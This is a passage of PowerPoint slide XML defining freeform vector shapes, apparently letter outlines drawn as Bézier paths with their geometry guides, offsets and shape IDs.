                <a:gd name="T19" fmla="*/ 218 h 218"/>
                <a:gd name="T20" fmla="*/ 99 w 249"/>
                <a:gd name="T21" fmla="*/ 218 h 218"/>
                <a:gd name="T22" fmla="*/ 119 w 249"/>
                <a:gd name="T23" fmla="*/ 203 h 218"/>
                <a:gd name="T24" fmla="*/ 99 w 249"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 100 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 31 h 218"/>
                <a:gd name="T32" fmla="*/ 172 w 249"/>
                <a:gd name="T33" fmla="*/ 75 h 218"/>
                <a:gd name="T34" fmla="*/ 172 w 249"/>
                <a:gd name="T35" fmla="*/ 188 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 249"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 133 w 249"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 249"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 229 w 249"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 249 w 249"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 229 w 249"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 207 w 249"/>
                <a:gd name="T49" fmla="*/ 188 h 218"/>
                <a:gd name="T50" fmla="*/ 207 w 249"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 249"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 77 w 249"/>
                <a:gd name="T55" fmla="*/ 2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9" h="218">
                  <a:moveTo>
                    <a:pt x="77" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="11"/>
                    <a:pt x="77" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="13" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="218"/>
                    <a:pt x="119" y="218"/>
                    <a:pt x="119" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="188"/>
                    <a:pt x="107" y="188"/>
                    <a:pt x="99" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="100"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="50"/>
                    <a:pt x="114" y="31"/>
                    <a:pt x="139" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="31"/>
                    <a:pt x="172" y="45"/>
                    <a:pt x="172" y="75"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="188"/>
                    <a:pt x="133" y="188"/>
                    <a:pt x="133" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="218"/>
                    <a:pt x="146" y="218"/>
                    <a:pt x="153" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="218"/>
                    <a:pt x="249" y="218"/>
                    <a:pt x="249" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="188"/>
                    <a:pt x="237" y="188"/>
                    <a:pt x="229" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="22"/>
                    <a:pt x="181" y="0"/>
                    <a:pt x="142" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="0"/>
                    <a:pt x="86" y="17"/>
                    <a:pt x="77" y="2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36" name="Freeform 277">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9013DF2B-2F2E-40AB-A250-47F670249CD0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId77"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2733676" y="3495676"/>
              <a:ext cx="88900" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 211"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 211"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 211"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 211"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 211"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 211"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 211"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 211"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 211"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 211"/>
                <a:gd name="T27" fmla="*/ 213 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 211"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 211 w 211"/>
                <a:gd name="T31" fmla="*/ 213 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 211"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 211"/>
                <a:gd name="T39" fmla="*/ 210 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 211"/>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 h="279">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="10"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="12" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="213"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="211" y="258"/>
                    <a:pt x="211" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="204"/>
                    <a:pt x="211" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="194"/>
                    <a:pt x="177" y="204"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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37" name="Freeform 278">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9CC7EF3-9651-4233-AFB4-A6FE887F12FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId78"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2881314" y="3589338"/>
              <a:ext cx="25400" cy="28575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="62">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62"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38" name="Freeform 279">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CED4E07-8F0C-4757-93F0-46E4CFAA5A84}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId79"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2963864" y="3521076"/>
              <a:ext cx="84138" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 178 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 113 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 34 w 196"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 116 w 196"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 145 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 222"/>
                <a:gd name="T14" fmla="*/ 167 w 196"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 116 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 111 h 222"/>
                <a:gd name="T22" fmla="*/ 110 w 196"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25"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22">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="181" y="151"/>
                    <a:pt x="178" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="151"/>
                    <a:pt x="165" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="168"/>
                    <a:pt x="149" y="192"/>
                    <a:pt x="113" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="192"/>
                    <a:pt x="34" y="157"/>
                    <a:pt x="34" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="88"/>
                    <a:pt x="48" y="30"/>
                    <a:pt x="116" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="30"/>
                    <a:pt x="145" y="30"/>
                    <a:pt x="145" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="52"/>
                    <a:pt x="155" y="59"/>
                    <a:pt x="167" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="59"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="171"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="110" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="196" y="173"/>
                    <a:pt x="196"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39" name="Freeform 280">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{742EE5DC-2C81-4443-B8B4-CC59FD1F0A7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId80"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3071814" y="3521076"/>
              <a:ext cx="85725" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 205 w 205"/>
                <a:gd name="T1" fmla="*/ 111 h 222"/>
                <a:gd name="T2" fmla="*/ 103 w 205"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 205"/>
                <a:gd name="T5" fmla="*/ 111 h 222"/>
                <a:gd name="T6" fmla="*/ 103 w 205"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 205 w 205"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 103 w 205"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 35 w 205"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 103 w 205"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 205"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 103 w 205"/>
                <a:gd name="T19" fmla="*/ 1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22">
                  <a:moveTo>
                    <a:pt x="205" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="49"/>
                    <a:pt x="159" y="0"/>
                    <a:pt x="103" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="48" y="222"/>
                    <a:pt x="103" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="222"/>
                    <a:pt x="205" y="174"/>
                    <a:pt x="205" y="111"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="103" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="192"/>
                    <a:pt x="35" y="154"/>
                    <a:pt x="35" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="63"/>
                    <a:pt x="67" y="30"/>
                    <a:pt x="103" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="30"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="154"/>
                    <a:pt x="140" y="192"/>
                    <a:pt x="103"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40" name="Freeform 281">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7C46AE5-1577-4B9B-8CA4-AB60EF7FDF91}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId81"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3181351" y="3521076"/>
              <a:ext cx="87313" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 204 w 204"/>
                <a:gd name="T1" fmla="*/ 111 h 222"/>
                <a:gd name="T2" fmla="*/ 102 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 204"/>
                <a:gd name="T5" fmla="*/ 111 h 222"/>
                <a:gd name="T6" fmla="*/ 102 w 204"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 204 w 204"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 102 w 204"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 34 w 204"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 102 w 204"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 204"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 102 w 204"/>
                <a:gd name="T19" fmla="*/ 1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22">
                  <a:moveTo>
                    <a:pt x="204" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="102" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="222"/>
                    <a:pt x="204" y="174"/>
                    <a:pt x="204" y="111"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="102" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="192"/>
                    <a:pt x="34" y="154"/>
                    <a:pt x="34" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="63"/>
                    <a:pt x="67" y="30"/>
                    <a:pt x="102" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="154"/>
                    <a:pt x="139" y="192"/>
                    <a:pt x="102"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41" name="Freeform 282">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15316268-9FB1-4768-9E8F-CCEF38A0A99D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId82"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3284539" y="3482976"/>
              <a:ext cx="103188" cy="134938"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 243"/>
                <a:gd name="T1" fmla="*/ 178 h 305"/>
                <a:gd name="T2" fmla="*/ 194 w 243"/>
                <a:gd name="T3" fmla="*/ 121 h 305"/>
                <a:gd name="T4" fmla="*/ 211 w 243"/>
                <a:gd name="T5" fmla="*/ 121 h 305"/>
                <a:gd name="T6" fmla="*/ 232 w 243"/>
                <a:gd name="T7" fmla="*/ 106 h 305"/>
                <a:gd name="T8" fmla="*/ 211 w 243"/>
                <a:gd name="T9" fmla="*/ 90 h 305"/>
                <a:gd name="T10" fmla="*/ 134 w 243"/>
                <a:gd name="T11" fmla="*/ 90 h 305"/>
                <a:gd name="T12" fmla="*/ 114 w 243"/>
                <a:gd name="T13" fmla="*/ 106 h 305"/>
                <a:gd name="T14" fmla="*/ 134 w 243"/>
                <a:gd name="T15" fmla="*/ 121 h 305"/>
                <a:gd name="T16" fmla="*/ 153 w 243"/>
                <a:gd name="T17" fmla="*/ 121 h 305"/>
                <a:gd name="T18" fmla="*/ 72 w 243"/>
                <a:gd name="T19" fmla="*/ 196 h 305"/>
                <a:gd name="T20" fmla="*/ 72 w 243"/>
                <a:gd name="T21" fmla="*/ 21 h 305"/>
                <a:gd name="T22" fmla="*/ 52 w 243"/>
                <a:gd name="T23" fmla="*/ 0 h 305"/>
                <a:gd name="T24" fmla="*/ 20 w 243"/>
                <a:gd name="T25" fmla="*/ 0 h 305"/>
                <a:gd name="T26" fmla="*/ 0 w 243"/>
                <a:gd name="T27" fmla="*/ 15 h 305"/>
                <a:gd name="T28" fmla="*/ 20 w 243"/>
                <a:gd name="T29" fmla="*/ 31 h 305"/>
                <a:gd name="T30" fmla="*/ 44 w 243"/>
                <a:gd name="T31" fmla="*/ 31 h 305"/>
                <a:gd name="T32" fmla="*/ 44 w 243"/>
                <a:gd name="T33" fmla="*/ 275 h 305"/>
                <a:gd name="T34" fmla="*/ 20 w 243"/>
                <a:gd name="T35" fmla="*/ 275 h 305"/>
                <a:gd name="T36" fmla="*/ 0 w 243"/>
                <a:gd name="T37" fmla="*/ 290 h 305"/>
                <a:gd name="T38" fmla="*/ 20 w 243"/>
                <a:gd name="T39" fmla="*/ 305 h 305"/>
                <a:gd name="T40" fmla="*/ 96 w 243"/>
                <a:gd name="T41" fmla="*/ 305 h 305"/>
                <a:gd name="T42" fmla="*/ 116 w 243"/>
                <a:gd name="T43" fmla="*/ 290 h 305"/>
                <a:gd name="T44" fmla="*/ 96 w 243"/>
                <a:gd name="T45" fmla="*/ 275 h 305"/>
                <a:gd name="T46" fmla="*/ 72 w 243"/>
                <a:gd name="T47" fmla="*/ 275 h 305"/>
                <a:gd name="T48" fmla="*/ 72 w 243"/>
                <a:gd name="T49" fmla="*/ 234 h 305"/>
                <a:gd name="T50" fmla="*/ 112 w 243"/>
                <a:gd name="T51" fmla="*/ 197 h 305"/>
                <a:gd name="T52" fmla="*/ 171 w 243"/>
                <a:gd name="T53" fmla="*/ 275 h 305"/>
                <a:gd name="T54" fmla="*/ 143 w 243"/>
                <a:gd name="T55" fmla="*/ 290 h 305"/>
                <a:gd name="T56" fmla="*/ 163 w 243"/>
                <a:gd name="T57" fmla="*/ 305 h 305"/>
                <a:gd name="T58" fmla="*/ 222 w 243"/>
                <a:gd name="T59" fmla="*/ 305 h 305"/>
                <a:gd name="T60" fmla="*/ 243 w 243"/>
                <a:gd name="T61" fmla="*/ 290 h 305"/>
                <a:gd name="T62" fmla="*/ 222 w 243"/>
                <a:gd name="T63" fmla="*/ 275 h 305"/>
                <a:gd name="T64" fmla="*/ 207 w 243"/>
                <a:gd name="T65" fmla="*/ 275 h 305"/>
                <a:gd name="T66" fmla="*/ 132 w 243"/>
                <a:gd name="T67" fmla="*/ 178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3" h="305">
                  <a:moveTo>
                    <a:pt x="132" y="178"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="194" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211" y="121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="121"/>
                    <a:pt x="232" y="121"/>
                    <a:pt x="232" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="90"/>
                    <a:pt x="219" y="90"/>
                    <a:pt x="211" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134" y="90"/>
